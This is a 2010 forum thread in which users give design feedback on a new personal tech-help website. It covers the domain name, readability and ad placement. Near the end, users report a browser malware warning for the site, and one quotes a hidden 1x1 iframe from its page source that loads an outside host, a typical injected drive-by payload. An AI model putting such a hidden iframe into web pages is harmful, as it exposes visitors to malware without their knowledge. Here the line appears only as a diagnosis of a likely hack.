Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi all,
Vanilla are planning an update to the site on April 24th (next Wednesday). It is a major PHP8 update which is expected to boost performance across the site. The site will be down from 7pm and it is expected to take about an hour to complete. We appreciate your patience during the update.
Thanks all.

NerdyCrap.com

Options
  • 20-09-2010 8:03pm
    Registered Users Posts: 2,099 ✭✭✭

Hi,

www.NerdyCrap.com

Made this website a couple of days ago and added some Google Adsense to it. Planning on adding some more content in the next couple of days and maybe CMS to make things easier. It has a simple design. But I like keeping things basic.

Regards,

Comments

• Registered Users Posts: 16,402 ✭✭✭✭Trojan

I'm not mad about the domain name.

If I visit the homepage, how do I know what the site is about? Maybe add a tagline or similar.

Domain as title tag sucks from SEO POV.

Creating a site that's very general as opposed to niche-specific can be very difficult as you're trying to be all things to all people.

Just some random feedback not going into too much depth here - ask specifics if you want more.

• Registered Users Posts: 4,850 ✭✭✭Cianos

The google ad boxes are spoiling the layout.

The page is text-heavy so white font on black background shouldn't be used. It's uncomfortable to read in bulk.

You need some kind of navigation or indexing system so people can find videos they'd be interested in. Right now it only seems ordered chronologically?

I'd echo Trojan and say that you should hone in on one area and do it very well. Nerdy Crap could relate to anything such as (and as has already been done hundreds of times); video games, computer modding, programming, hacking and so on and so forth. The point is, tech is a vast world and unless you pick a niche you'll be lost in the noise.

• Closed Accounts Posts: 166 ✭✭vandammaged

I agree you need to change the name.

to free malware help.

and make a video like stephen fry and explain what spyware is and malware to the average Irish potato farmer.

So they can understand.

I would like to add I thought I was going onto a site where i could buy nerdy crap gadgets
    Dean820 wrote: »
    Hi,

www.NerdyCrap.com

Made this website a couple of days ago and added some Google Adsense to it. Planning on adding some more content in the next couple of days and maybe CMS to make things easier. It has a simple design. But I like keeping things basic.

Regards,

• Closed Accounts Posts: 2 jonray

I am web designer / web developer and joined today in this forum and found this interesting area of board to review the site.

Well it's very easy to point out some one's work but it's difficult to make it. Anyways I've just visited nerdycrap.com and found it not a bad site at all.

As all others suggested yes there is a need to change the domain name or at-least add some slogan to clearly indicate the niche of the site as now a days web surfers are becoming more intelligent and also don't have much time to see what's in the site they want to immediately know whether they come to the right place or not.

As far as design is concerned it's ok for me but could be much more attractive.

Regards,
    Jon Ray

• Closed Accounts Posts: 48 Ronan_

I hate sites that have words in text hyperlinked for ads :(

• Advertisement
  • Registered Users Posts: 6,995 ✭✭✭Sofiztikated

From just glancing at the site, its quite hard to read at length.

Also, with the Adsense, its quite hard to distinguish what is an ad and what is article. For example, the

- For DESKTOPs with a SATA Hard drive (newer computers)
    Vantec NexStar 3 NST-360SU-BK 3.5" SATA Hard drive enclosure
    -For DESKTOPs with an IDE Hard drive (old computers)
    Vantec NexStar 3 NST-360U2-RD 3.5" IDE Hard drive enclosure
    - For LAPTOPs with a SATA Hard drive (newer computers)
    Vantec NexStar TX 2.5" SATA Hard drive enclosure
    - For LAPTOPs with an IDE Hard drive (old computers)
    Vantec NexStar SX NST-285U2-BK 2.5" IDE Hard drive enclosure

I assumed was an ad when I scanned through it.

Also, it could just be me, are you Irish based? If so, then why do you reference Best Buy/Fry's electronics in the article?

• Registered Users Posts: 16,402 ✭✭✭✭Trojan

Also, with the Adsense, its quite hard to distinguish what is an ad and what is article.

Sadly most MadeForAdsense (MFA) sites deliberately do that to increase ad clickthrough.

• Registered Users Posts: 703 ✭✭✭obliviousgrudge

If you want visitors to keep coming to your site, I'd recommend you have no ads at all until you build up a readership who keep coming, then, ad the advertisements.

• Registered Users Posts: 2,091 ✭✭✭BengaLover

I closed the browser almost 2 seconds after clicking your link.
    Cant be arsed trying to read the white writing on the black background - far too hard, and redolent of lots of gaming/rpg forums and websites.
    Like the general idea, but you will have to compete with the brilliant How To and eHow sites..

• Banned (with Prison Access) Posts: 141 ✭✭en.r4cart

I got a warning when i visited it:
    Warning: Visiting this site may harm your computer!
    The website at www.nerdycrap.com appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that hosts malware can infect your computer.
    For detailed information about the problems with this site, visit the Google Safe Browsing diagnostic page for www.nerdycrap.com.
    Learn more about how to protect yourself from harmful software online.

• Advertisement
  • Registered Users Posts: 207 ✭✭hobbit stomper

I got a warning when i visited it:

Same here.

Either you got hacked or you are playing with fire ;)

This line of code is very suspicious:
    <body><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe> 

• Banned (with Prison Access) Posts: 141 ✭✭en.r4cart

Trojan wrote: »
    Sadly most MadeForAdsense (MFA) sites deliberately do that to increase ad clickthrough.
    I agree that.
    I have adversed on google adwords. And i found a lot od site like that.
    and what is worse, It cost my money by invalid clicks.

Advertisement